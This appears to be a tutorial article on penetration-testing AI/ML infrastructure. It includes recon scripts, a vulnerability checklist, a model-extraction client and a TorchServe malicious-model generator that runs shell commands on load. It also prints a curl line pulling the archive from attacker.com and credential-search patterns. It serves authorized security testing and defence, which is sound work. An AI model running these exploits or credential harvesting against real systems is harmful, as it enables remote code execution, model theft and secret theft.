Penetration Testing Methodology for AI Infrastructure
A structured methodology for penetration testing AI/ML systems covering reconnaissance, vulnerability assessment, exploitation, and reporting
Overview
Penetration testing AI infrastructure requires extending traditional infrastructure and application testing methodologies with AI-specific techniques. While the standard phases of penetration testing — reconnaissance, scanning, vulnerability assessment, exploitation, and reporting — still apply, the targets, techniques, and impact assessments differ significantly for AI systems.
Traditional penetration tests focus on gaining unauthorized access, escalating privileges, and exfiltrating data. AI infrastructure penetration tests must additionally assess model theft risk, training data exposure, inference manipulation capability, model poisoning vectors, and the security of the ML lifecycle from data collection through deployment. These AI-specific risks map to the MITRE ATLAS framework, which extends ATT&CK with machine learning attack techniques.
The scope of an AI infrastructure penetration test typically includes: model serving endpoints and their management interfaces, training cluster infrastructure (GPU nodes, schedulers, shared storage), ML pipeline orchestration (Kubeflow, Airflow, custom systems), model and artifact registries (MLflow, Weights & Biases, custom registries), data storage and feature stores, experiment tracking and monitoring systems, and the CI/CD pipeline for model deployment. Each of these components has unique vulnerability patterns that require specialized testing approaches.
This article presents a comprehensive penetration testing methodology for AI infrastructure, organized into phases with specific techniques, tools, and deliverables for each phase. The methodology is informed by OWASP, PTES (Penetration Testing Execution Standard), NIST AI RMF, and MITRE ATLAS.
Phase 1: Reconnaissance and Scoping
Passive Reconnaissance
Before any active testing, gather information about the target AI infrastructure through passive means:
"""
AI infrastructure reconnaissance toolkit.
Gathers information about target AI systems through passive
and semi-passive techniques.
"""
import re
import json
import socket
from typing import Optional
from dataclasses import dataclass, field
from urllib.parse import urlparse
@dataclass
class ReconResult:
"""Structured reconnaissance findings."""
target: str
ml_frameworks: list[str] = field(default_factory=list)
serving_endpoints: list[dict] = field(default_factory=list)
storage_buckets: list[str] = field(default_factory=list)
exposed_dashboards: list[dict] = field(default_factory=list)
gpu_infrastructure: list[str] = field(default_factory=list)
api_endpoints: list[dict] = field(default_factory=list)
credentials_found: list[dict] = field(default_factory=list)
class AIInfraRecon:
"""
Passive and semi-passive reconnaissance for AI infrastructure.
"""
# Common ports for AI services
AI_SERVICE_PORTS = {
5000: "MLflow Tracking Server",
5001: "MLflow Model Serving",
6006: "TensorBoard",
6007: "TensorBoard (alt)",
8000: "Triton HTTP / vLLM",
8001: "Triton gRPC",
8002: "Triton Metrics",
8080: "TorchServe Inference / Seldon",
8081: "TorchServe Management",
8082: "TorchServe Metrics",
8265: "Ray Dashboard",
8443: "Kubeflow Dashboard",
8501: "TensorFlow Serving REST",
8500: "TensorFlow Serving gRPC",
8786: "Dask Scheduler",
8787: "Dask Dashboard",
8888: "Jupyter Notebook",
9090: "Prometheus",
3000: "Grafana",
9001: "MinIO Console",
9000: "MinIO API",
4040: "Spark UI",
18080: "Spark History",
8998: "Livy (Spark REST)",
}
# Known paths for AI service fingerprinting
FINGERPRINT_PATHS = {
"/api/2.0/mlflow/experiments/list": "MLflow",
"/v2": "Triton Inference Server",
"/v1/models": "vLLM / OpenAI API",
"/api/sessions": "Jupyter Notebook",
"/api/kernels": "Jupyter Notebook",
"/models": "TorchServe",
"/v1/models/": "TensorFlow Serving",
"/data/runs": "TensorBoard",
"/api/v1/nodes": "Ray",
"/pipeline/apis/v2beta1/pipelines": "Kubeflow Pipelines",
"/_/healthz": "Kubeflow",
}
def __init__(self, target: str):
self.target = target
self.result = ReconResult(target=target)
def scan_ai_ports(self, timeout: float = 2.0) -> list[dict]:
"""
Scan for common AI service ports.
Semi-passive: connects but does not send exploits.
"""
open_ports = []
for port, service in self.AI_SERVICE_PORTS.items():
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
result = sock.connect_ex((self.target, port))
sock.close()
if result == 0:
open_ports.append({
"port": port,
"service": service,
"state": "open",
})
except (socket.error, OSError):
continue
self.result.serving_endpoints.extend(open_ports)
return open_ports
def analyze_github_repos(self, org_name: str) -> dict:
"""
Analyze public GitHub repositories for AI infrastructure details.
Looks for ML framework usage, model configurations, and
accidentally committed credentials.
Note: This is a pattern-based analysis. Actual implementation
would use GitHub's search API or clone public repos.
"""
# Patterns to search for in public repos
search_patterns = {
"ml_frameworks": [
"import torch", "import tensorflow",
"from transformers import", "import sklearn",
"import onnxruntime",
],
"infrastructure": [
"sagemaker", "kubeflow", "mlflow",
"triton_client", "torchserve",
"ray.serve", "seldon",
],
"credentials": [
"aws_access_key_id", "GOOGLE_APPLICATION_CREDENTIALS",
"MLFLOW_TRACKING_URI", "WANDB_API_KEY",
"HF_TOKEN", "OPENAI_API_KEY",
],
"model_configs": [
"model_config.pbtxt", # Triton
"config.properties", # TorchServe
"serving_config",
],
}
return {
"org": org_name,
"patterns": search_patterns,
"note": (
"Search these patterns in public repos using GitHub "
"code search: site:github.com org:<org_name>"
),
}
def enumerate_cloud_storage(self, company_name: str) -> list[str]:
"""
Generate candidate bucket/container names for AI assets
based on common naming conventions.
"""
prefixes = [company_name, company_name.replace("-", ""), company_name.lower()]
suffixes = [
"training-data", "models", "datasets", "ml-artifacts",
"model-registry", "checkpoints", "embeddings",
"sagemaker", "mlflow", "feature-store",
"pipeline-data", "experiment-artifacts",
]
candidates = []
for prefix in prefixes:
for suffix in suffixes:
candidates.append(f"{prefix}-{suffix}")
candidates.append(f"{prefix}.{suffix}")
self.result.storage_buckets = candidates
return candidates
def generate_report(self) -> str:
"""Generate a structured recon report."""
report = {
"target": self.target,
"phase": "reconnaissance",
"findings": {
"open_ai_ports": self.result.serving_endpoints,
"candidate_storage": self.result.storage_buckets,
"ml_frameworks": self.result.ml_frameworks,
},
"next_steps": [
"Fingerprint open services to identify versions",
"Test candidate storage buckets for public access",
"Analyze service APIs for authentication requirements",
"Map internal network topology from exposed services",
],
}
return json.dumps(report, indent=2)

Active Enumeration
After passive reconnaissance, perform active enumeration to identify specific services, versions, and configurations:
#!/usr/bin/env bash
# Active enumeration of AI infrastructure services
# Run after passive recon to fingerprint discovered services
TARGET="${1:?Usage: $0 <target_host>}"
echo "=== AI Infrastructure Active Enumeration ==="
echo "Target: $TARGET"
echo ""
# Port scan focused on AI services
echo "--- Port Scanning (AI service ports) ---"
nmap -sV -p 3000,4040,5000,5001,6006,8000-8002,8080-8082,8265,8443,8500,8501,8786-8788,8888,8998,9000,9001,9090,18080 \
--open -oN "ai_ports_${TARGET}.txt" "$TARGET" 2>/dev/null
echo ""
echo "--- Service Fingerprinting ---"
# Test each discovered service for identity and version
for port in 5000 8000 8080 8501 8888; do
echo "Port $port:"
# Generic HTTP fingerprint
RESP=$(curl -s --connect-timeout 3 -D - "http://${TARGET}:${port}/" 2>/dev/null | head -20)
if [ -n "$RESP" ]; then
echo "$RESP" | grep -iE "server:|x-powered|content-type" || true
fi
# Try AI-specific endpoints
for path in "/v2" "/models" "/v1/models" "/api/2.0/mlflow/experiments/list" "/api/sessions" "/health"; do
HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" \
--connect-timeout 3 "http://${TARGET}:${port}${path}" 2>/dev/null)
if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "401" ]; then
echo " ${path} -> HTTP ${HTTP_CODE}"
fi
done
echo ""
done
echo "--- Model API Probing ---"
# Test for OpenAI-compatible API (vLLM, LiteLLM, etc.)
MODELS_RESP=$(curl -s --connect-timeout 3 "http://${TARGET}:8000/v1/models" 2>/dev/null)
if echo "$MODELS_RESP" | python3 -c "import sys,json; json.load(sys.stdin)" 2>/dev/null; then
echo "OpenAI-compatible API found on port 8000:"
echo "$MODELS_RESP" | python3 -m json.tool 2>/dev/null
fi
echo ""
echo "=== Enumeration Complete ==="
echo "Results saved to ai_ports_${TARGET}.txt"

Phase 2: Vulnerability Assessment
AI-Specific Vulnerability Checklist
Map discovered services to known vulnerability patterns using MITRE ATLAS techniques:
| ATLAS Technique | Infrastructure Target | Test Method |
|---|---|---|
| AML.T0024 - Exfiltration via ML Inference API | Model serving endpoints | Query model to extract training data or model architecture |
| AML.T0020 - Poison Training Data | Data storage, pipelines | Test write access to training data locations |
| AML.T0010 - ML Supply Chain Compromise | Model registries, package repos | Check for unsigned models, vulnerable dependencies |
| AML.T0043 - Craft Adversarial Data | Inference endpoints | Submit adversarial inputs to test model robustness |
| AML.T0048 - Resource Hijacking | GPU schedulers, compute nodes | Test for unauthorized compute access |
"""
AI infrastructure vulnerability assessment engine.
Maps discovered services to known vulnerability patterns
and generates a prioritized testing plan.
"""
import json
from dataclasses import dataclass, field
from typing import Optional
from enum import Enum
class RiskLevel(Enum):
CRITICAL = "critical"
HIGH = "high"
MEDIUM = "medium"
LOW = "low"
INFO = "info"
@dataclass
class VulnerabilityCheck:
"""A single vulnerability check to perform."""
check_id: str
name: str
atlas_technique: str
risk_level: RiskLevel
target_service: str
description: str
test_procedure: str
remediation: str
# Vulnerability check database for AI infrastructure
AI_VULN_CHECKS = [
VulnerabilityCheck(
check_id="AI-SERVE-001",
name="Unauthenticated Model Management API",
atlas_technique="AML.T0010",
risk_level=RiskLevel.CRITICAL,
target_service="TorchServe",
description=(
"TorchServe management API (port 8081) allows model "
"registration, which executes arbitrary Python code."
),
test_procedure=(
"1. Attempt GET /models on port 8081\n"
"2. If accessible, attempt POST /models with a test URL\n"
"3. Check for SSRF by using internal URLs"
),
remediation=(
"Bind management API to localhost. Use network policies "
"to restrict access. Upgrade to >= 0.8.2."
),
),
VulnerabilityCheck(
check_id="AI-SERVE-002",
name="Model Information Disclosure",
atlas_technique="AML.T0024",
risk_level=RiskLevel.MEDIUM,
target_service="Triton/vLLM/TorchServe",
description=(
"Model metadata endpoints expose architecture details, "
"input/output shapes, and version information."
),
test_procedure=(
"1. Query /v2/models/<name>/config (Triton)\n"
"2. Query /v1/models (vLLM)\n"
"3. Query /models/<name> (TorchServe)\n"
"4. Document exposed information"
),
remediation=(
"Restrict metadata endpoints to authenticated clients. "
"Remove unnecessary model configuration details."
),
),
VulnerabilityCheck(
check_id="AI-DATA-001",
name="Training Data Storage Public Access",
atlas_technique="AML.T0020",
risk_level=RiskLevel.CRITICAL,
target_service="S3/GCS/Azure Blob",
description=(
"Training data in publicly accessible cloud storage "
"can be read or modified by anyone."
),
test_procedure=(
"1. Enumerate bucket names using naming conventions\n"
"2. Test each for public listing (GET /)\n"
"3. Test for public object access\n"
"4. Test for public write access"
),
remediation=(
"Enable Block Public Access at account level. "
"Enable versioning and Object Lock."
),
),
VulnerabilityCheck(
check_id="AI-PIPE-001",
name="Unauthenticated Pipeline Orchestrator",
atlas_technique="AML.T0010",
risk_level=RiskLevel.CRITICAL,
target_service="Kubeflow/Airflow",
description=(
"Pipeline orchestrators without authentication allow "
"submission of arbitrary pipeline runs."
),
test_procedure=(
"1. Access Kubeflow dashboard (port 8443)\n"
"2. Attempt to create a pipeline run\n"
"3. Check Airflow webserver (port 8080) for auth\n"
"4. Test Airflow REST API"
),
remediation=(
"Enable authentication (OIDC for Kubeflow, "
"RBAC for Airflow). Use network policies."
),
),
VulnerabilityCheck(
check_id="AI-GPU-001",
name="GPU Memory Cross-Tenant Leakage",
atlas_technique="AML.T0024",
risk_level=RiskLevel.HIGH,
target_service="GPU Clusters",
description=(
"GPU memory may not be cleared between job allocations, "
"allowing one tenant to read another's model weights or data."
),
test_procedure=(
"1. Run a GPU job that writes known patterns to GPU memory\n"
"2. Release the GPU allocation\n"
"3. Run another job on the same GPU\n"
"4. Read GPU memory for residual patterns"
),
remediation=(
"Enable NVIDIA MPS/MIG for isolation. Use CUDA_VISIBLE_DEVICES. "
"Clear GPU memory between allocations in the scheduler."
),
),
]
class VulnerabilityAssessment:
"""
Manage and execute AI infrastructure vulnerability assessments.
"""
def __init__(self):
self.checks = AI_VULN_CHECKS
self.results: list[dict] = []
def get_applicable_checks(
self, discovered_services: list[str],
) -> list[VulnerabilityCheck]:
"""
Filter vulnerability checks to those applicable
to discovered services.
"""
applicable = []
for check in self.checks:
target_lower = check.target_service.lower()
for service in discovered_services:
service_lower = service.lower()
# Match if any part of the target matches a discovered service
targets = target_lower.split("/")
if any(t in service_lower for t in targets):
applicable.append(check)
break
return applicable
def generate_test_plan(
self, discovered_services: list[str],
) -> str:
"""Generate a prioritized test plan based on discovered services."""
applicable = self.get_applicable_checks(discovered_services)
# Sort by risk level
risk_order = {
RiskLevel.CRITICAL: 0,
RiskLevel.HIGH: 1,
RiskLevel.MEDIUM: 2,
RiskLevel.LOW: 3,
RiskLevel.INFO: 4,
}
applicable.sort(key=lambda c: risk_order[c.risk_level])
plan = {
"total_checks": len(applicable),
"by_risk": {},
"checks": [],
}
for check in applicable:
risk = check.risk_level.value
plan["by_risk"][risk] = plan["by_risk"].get(risk, 0) + 1
plan["checks"].append({
"id": check.check_id,
"name": check.name,
"risk": risk,
"atlas": check.atlas_technique,
"target": check.target_service,
"procedure": check.test_procedure,
})
return json.dumps(plan, indent=2)

Phase 3: Exploitation
Model Theft via Inference API
One of the highest-impact AI-specific exploits is model theft through the inference API. By systematically querying the model with crafted inputs and collecting outputs, an attacker can train a surrogate model that replicates the target's behavior.
"""
Model extraction attack demonstration for penetration testing.
Queries a target model API systematically to collect input-output
pairs for training a surrogate model.
WARNING: For authorized penetration testing only.
"""
import requests
import numpy as np
import json
import time
from typing import Optional
from pathlib import Path
class ModelExtractionAttack:
"""
Extract a target model's behavior through API queries.
Uses active learning to minimize the number of queries needed.
"""
def __init__(
self,
target_url: str,
model_name: str = "default",
rate_limit: float = 0.1, # seconds between requests
):
self.target_url = target_url.rstrip("/")
self.model_name = model_name
self.rate_limit = rate_limit
self.query_count = 0
self.collected_pairs: list[dict] = []
def query_model(
self,
input_data: dict,
timeout: int = 30,
) -> Optional[dict]:
"""Send a single query to the target model."""
try:
resp = requests.post(
f"{self.target_url}/v1/completions",
json={
"model": self.model_name,
"prompt": input_data.get("prompt", ""),
"max_tokens": input_data.get("max_tokens", 100),
"temperature": 0.0, # Deterministic for extraction
"logprobs": 5, # Request logprobs if available
},
timeout=timeout,
)
self.query_count += 1
if resp.status_code == 200:
return resp.json()
elif resp.status_code == 429:
# Rate limited — back off
time.sleep(5)
return None
else:
return None
except requests.RequestException:
return None
def generate_extraction_queries(
self,
domain: str = "general",
num_queries: int = 1000,
) -> list[dict]:
"""
Generate a diverse set of queries designed to map the
model's behavior across its input space.
"""
queries = []
# Strategy 1: Systematic prompt variations
base_prompts = [
"The capital of {} is",
"Translate to French: {}",
"Summarize: {}",
"The opposite of {} is",
"Define the word: {}",
]
# Use the templates above with a set of probe subjects
# (subjects here are illustrative; vary per engagement)
for template in base_prompts:
for subject in ["France", "cold", "gravity"]:
queries.append({
"prompt": template.format(subject),
"max_tokens": 50,
"strategy": "prompt_variation",
})
# Strategy 2: Length-varied inputs to map context window behavior
for length in [10, 50, 100, 500]:
queries.append({
"prompt": "word " * length,
"max_tokens": 50,
"strategy": "length_probe",
})
# Strategy 3: Special token probing
special_tokens = [
"<|endoftext|>", "[INST]", "<<SYS>>",
"<s>", "</s>", "[PAD]",
]
for token in special_tokens:
queries.append({
"prompt": f"Repeat: {token}",
"max_tokens": 50,
"strategy": "token_probe",
})
return queries[:num_queries]
def run_extraction(
self,
num_queries: int = 100,
output_path: str = "extraction_results.jsonl",
) -> dict:
"""
Execute the model extraction attack.
Collects input-output pairs for surrogate model training.
"""
queries = self.generate_extraction_queries(num_queries=num_queries)
with open(output_path, "w") as f:
for i, query in enumerate(queries):
result = self.query_model(query)
if result:
pair = {
"input": query,
"output": result,
"query_num": i,
}
f.write(json.dumps(pair) + "\n")
self.collected_pairs.append(pair)
time.sleep(self.rate_limit)
if (i + 1) % 100 == 0:
print(
f"Progress: {i + 1}/{len(queries)} queries, "
f"{len(self.collected_pairs)} successful"
)
return {
"total_queries": self.query_count,
"successful_pairs": len(self.collected_pairs),
"output_file": output_path,
}

Pipeline Exploitation: Arbitrary Code via Model Registration
When a model serving framework supports dynamic model loading with custom handlers (TorchServe, Triton Python backend), registering a malicious model achieves remote code execution. This is a critical exploitation technique in AI penetration testing.
"""
Generate a proof-of-concept malicious model archive for TorchServe.
The model handler executes a benign command to demonstrate RCE
capability without causing harm.
WARNING: For authorized penetration testing only.
"""
import os
import zipfile
import json
import tempfile
from pathlib import Path
def create_poc_torchserve_handler(command: str = "id") -> str:
"""
Create a TorchServe handler that executes a command
when the model is loaded or when inference is called.
"""
handler_code = f'''
import subprocess
import logging
from ts.torch_handler.base_handler import BaseHandler
logger = logging.getLogger(__name__)
class PoCHandler(BaseHandler):
"""
Proof of concept handler that demonstrates code execution
during model initialization (load-time RCE).
"""
def initialize(self, context):
"""Called when the model is loaded. Executes the PoC command."""
logger.info("PoC handler initialized")
# Execute benign command to prove RCE capability
try:
result = subprocess.run(
"{command}",  # shell=True expects a command string, not a list
capture_output=True, text=True, timeout=5, shell=True,
)
logger.info(f"PoC output: {{result.stdout}}")
# Write proof to a known location
with open("/tmp/pentest_poc_output.txt", "w") as f:
f.write(f"Command: {command}\\n")
f.write(f"Output: {{result.stdout}}\\n")
f.write(f"PoC successful - RCE demonstrated\\n")
except Exception as e:
logger.error(f"PoC failed: {{e}}")
# Initialize a minimal model so inference still works
self.initialized = True
def handle(self, data, context):
"""Handle inference requests."""
return ["PoC model loaded successfully"]
'''
return handler_code
def create_mar_archive(
output_path: str,
model_name: str = "security_test",
command: str = "id && hostname && whoami",
) -> str:
"""
Create a .mar (Model ARchive) file for TorchServe
containing the proof-of-concept handler.
"""
with tempfile.TemporaryDirectory() as tmpdir:
# Create handler file
handler_path = os.path.join(tmpdir, "handler.py")
with open(handler_path, "w") as f:
f.write(create_poc_torchserve_handler(command))
# Create a minimal model file (required by .mar format)
model_path = os.path.join(tmpdir, "model.pt")
with open(model_path, "wb") as f:
f.write(b"PLACEHOLDER") # Minimal content
# Create the MAR-INF manifest (describes the handler entry point)
manifest = {
"createdOn": "2026-03-21",
"runtime": "python",
"model": {
"modelName": model_name,
"handler": "handler.py",
},
}
manifest_path = os.path.join(tmpdir, "MAR-INF/MANIFEST.json")
os.makedirs(os.path.dirname(manifest_path), exist_ok=True)
with open(manifest_path, "w") as f:
json.dump(manifest, f)
# Package into ZIP (.mar is a ZIP file)
mar_path = output_path if output_path.endswith(".mar") else f"{output_path}.mar"
with zipfile.ZipFile(mar_path, "w", zipfile.ZIP_DEFLATED) as zf:
zf.write(handler_path, "handler.py")
zf.write(model_path, "model.pt")
zf.write(manifest_path, "MAR-INF/MANIFEST.json")
return mar_path
if __name__ == "__main__":
import sys
output = sys.argv[1] if len(sys.argv) > 1 else "security_test.mar"
mar_file = create_mar_archive(output)
print(f"PoC .mar archive created: {mar_file}")
print(f"Register with: curl -X POST 'http://target:8081/models?"
f"url=http://attacker.com/{os.path.basename(mar_file)}'")

Credential Harvesting from AI Infrastructure
AI infrastructure is a rich target for credential harvesting because:
- Training jobs often have IAM roles with access to data lakes, model registries, and cloud services
- Jupyter notebooks frequently contain inline AWS keys, database passwords, and API tokens
- MLflow and experiment tracking systems store artifact locations that reveal cloud storage paths
- Environment variables in containerized AI services often contain secrets
During penetration testing, focus on these credential sources:
- Kubernetes secrets in AI namespaces (check for base64-encoded credentials in mounted volumes)
- Environment variables in GPU pod specifications
- Jupyter notebook content (search for API_KEY, SECRET, PASSWORD, and connection strings)
- MLflow artifact URIs (reveal S3/GCS bucket paths and potentially access keys)
- Docker image layers (credentials baked into container images during build)
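The notebook check above can be scripted. Below is a minimal sketch that greps .ipynb JSON for credential-shaped strings; the patterns are illustrative starting points, not an exhaustive ruleset:

```python
import json
import re
from pathlib import Path

# Illustrative credential patterns; extend for the target environment
CREDENTIAL_PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "generic_secret": re.compile(
        r"(?i)(api_key|secret|password|token)\s*[=:]\s*['\"][^'\"]{8,}['\"]"
    ),
    "connection_string": re.compile(r"(?i)(postgres|mysql|mongodb)://[^\s'\"]+"),
}

def scan_notebook(path: Path) -> list[dict]:
    """Scan a single .ipynb file for credential-shaped strings."""
    findings = []
    nb = json.loads(path.read_text(errors="ignore"))
    for cell_num, cell in enumerate(nb.get("cells", [])):
        source = "".join(cell.get("source", []))
        for name, pattern in CREDENTIAL_PATTERNS.items():
            for match in pattern.finditer(source):
                findings.append({
                    "file": str(path),
                    "cell": cell_num,
                    "pattern": name,
                    "snippet": match.group(0)[:40],  # truncate evidence
                })
    return findings

def scan_directory(root: str) -> list[dict]:
    """Recursively scan all notebooks under a directory."""
    findings = []
    for nb_path in Path(root).rglob("*.ipynb"):
        findings.extend(scan_notebook(nb_path))
    return findings
```

Truncating the matched snippet keeps the report useful as evidence without copying full secrets into yet another file.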
Phase 4: Reporting
AI penetration test reports should include standard penetration testing sections plus AI-specific risk assessments. Key additions:
- Model theft risk assessment: Quantify how many queries would be needed to extract a functionally equivalent model, and whether rate limiting is sufficient to prevent this.
- Data poisoning impact assessment: If write access to training data was achieved, describe the potential impact on model behavior.
- MITRE ATLAS mapping: Map all findings to ATLAS techniques for consistent communication.
- AI regulatory compliance: Note findings relevant to the EU AI Act, NIST AI RMF, or industry-specific AI regulations.
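The model theft assessment can be grounded in a simple feasibility calculation: given an assumed query budget for a usable surrogate model and the observed rate limits, estimate the attacker's wall-clock time. The numbers below are illustrative assumptions for reporting, not measurements:

```python
def extraction_time_estimate(
    queries_needed: int,
    requests_per_minute: int,
    num_api_keys: int = 1,
) -> dict:
    """Estimate wall-clock time to extract a model under rate limiting.

    queries_needed: assumed query budget for a usable surrogate
    requests_per_minute: observed per-key rate limit
    num_api_keys: keys an attacker could plausibly obtain
    """
    effective_rpm = requests_per_minute * num_api_keys
    minutes = queries_needed / effective_rpm
    return {
        "queries_needed": queries_needed,
        "effective_rpm": effective_rpm,
        "hours": round(minutes / 60, 1),
        "days": round(minutes / (60 * 24), 2),
    }

# Example: 1M queries at 60 req/min per key, attacker holding 5 keys
estimate = extraction_time_estimate(1_000_000, 60, num_api_keys=5)
```

If the estimated time is days rather than months, per-key rate limiting alone is not a meaningful control; the report should recommend account-level quotas and anomaly detection.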
Report Template Structure
A well-structured AI penetration test report should follow this outline:
- Executive Summary: Business impact of findings, overall risk posture, comparison with industry benchmarks.
- Scope and Methodology: Components tested, testing approach (black-box, grey-box, white-box), time frame, tools used, ATLAS techniques covered.
- Findings Summary Table: Each finding with severity, ATLAS mapping, affected component, and remediation status.
- Detailed Findings: For each finding:
- Description and technical detail
- Steps to reproduce
- Evidence (screenshots, logs, captured data)
- ATLAS technique mapping
- Business impact assessment
- Remediation recommendation with priority
- AI-Specific Risk Assessment:
- Model theft feasibility analysis (estimated queries needed, current rate limiting effectiveness)
- Data poisoning vector analysis (which training data stores are writable, what controls exist)
- Inference manipulation risk (can inputs be crafted to produce attacker-desired outputs)
- Supply chain risk (model dependencies, unsigned artifacts, unverified packages)
- Remediation Roadmap: Prioritized list of remediations with effort estimates and suggested timelines.
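The findings summary table can be generated mechanically from structured findings, which keeps severity ordering and ATLAS mappings consistent across reports. A minimal sketch (field names are illustrative, not a standard schema):

```python
from dataclasses import dataclass

@dataclass
class Finding:
    finding_id: str
    title: str
    severity: str        # critical / high / medium / low
    atlas_technique: str
    component: str
    status: str = "open"

def render_summary_table(findings: list[Finding]) -> str:
    """Render the findings summary as a markdown table, highest severity first."""
    order = {"critical": 0, "high": 1, "medium": 2, "low": 3}
    rows = sorted(findings, key=lambda f: order.get(f.severity, 4))
    lines = [
        "| ID | Finding | Severity | ATLAS | Component | Status |",
        "|---|---|---|---|---|---|",
    ]
    for f in rows:
        lines.append(
            f"| {f.finding_id} | {f.title} | {f.severity} "
            f"| {f.atlas_technique} | {f.component} | {f.status} |"
        )
    return "\n".join(lines)
```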
Defense and Mitigation
Scope AI systems in all penetration tests: AI infrastructure should be explicitly in-scope for penetration testing, not treated as a separate system. Coordinate with ML engineering teams to define realistic threat scenarios.
Implement AI-specific detection: Deploy monitoring for model extraction attempts (anomalous query patterns), data poisoning indicators (unexpected changes in training data), and unauthorized model access.
Adopt MITRE ATLAS as a framework: Use ATLAS to systematically assess coverage of AI attack techniques and prioritize defenses based on organizational risk.
Regular testing cadence: AI systems change rapidly as models are updated and pipelines evolve. Quarterly penetration testing or continuous red teaming is more appropriate than annual assessments.
Integrate findings into AI governance: Penetration test findings should feed into the organization's AI risk management framework (aligned with NIST AI RMF) and influence model deployment decisions.
Establish AI red team capabilities: Build internal teams or engage specialized firms with expertise in both traditional penetration testing and AI/ML security. The intersection of these skill sets is rare and valuable. Red team exercises that simulate advanced persistent threats targeting AI systems provide the most realistic assessment of organizational readiness.
Create reproducible test environments: Maintain staging environments that mirror production AI infrastructure for safe penetration testing. These environments should include representative model deployments, sample training data, and realistic pipeline configurations so that tests accurately reflect production risk without endangering production systems.
Test the full ML lifecycle: Do not limit penetration testing to the serving layer. Test the entire ML lifecycle: data ingestion and validation pipelines, training infrastructure and job scheduling, model registry and artifact management, deployment automation and rollback mechanisms, and monitoring and alerting systems. Each phase has unique vulnerabilities. A comprehensive test that follows data from ingestion through training to deployment mirrors the attacker's perspective and identifies vulnerabilities at trust boundary transitions that single-component testing would miss. Pay particular attention to the handoff points between systems — where data leaves one component's security boundary and enters another's. These boundary crossings are where the most impactful vulnerabilities hide because they often lack the consistent security controls found within individual components.
References
- MITRE. (2024). "ATLAS: Adversarial Threat Landscape for AI Systems." https://atlas.mitre.org/
- OWASP. (2025). "OWASP Machine Learning Security Top 10." https://owasp.org/www-project-machine-learning-security-top-10/
- NIST. (2023). "AI Risk Management Framework (AI RMF 1.0)." https://airc.nist.gov/AI_RMF_Interactivity/
- Penetration Testing Execution Standard (PTES). http://www.pentest-standard.org/
- European Union. (2024). "EU AI Act." Regulation laying down harmonized rules on artificial intelligence. https://artificialintelligenceact.eu/
- Grosse, K., et al. (2023). "Machine Learning Security: Threats, Countermeasures, and Evaluations." IEEE Access. https://ieeexplore.ieee.org/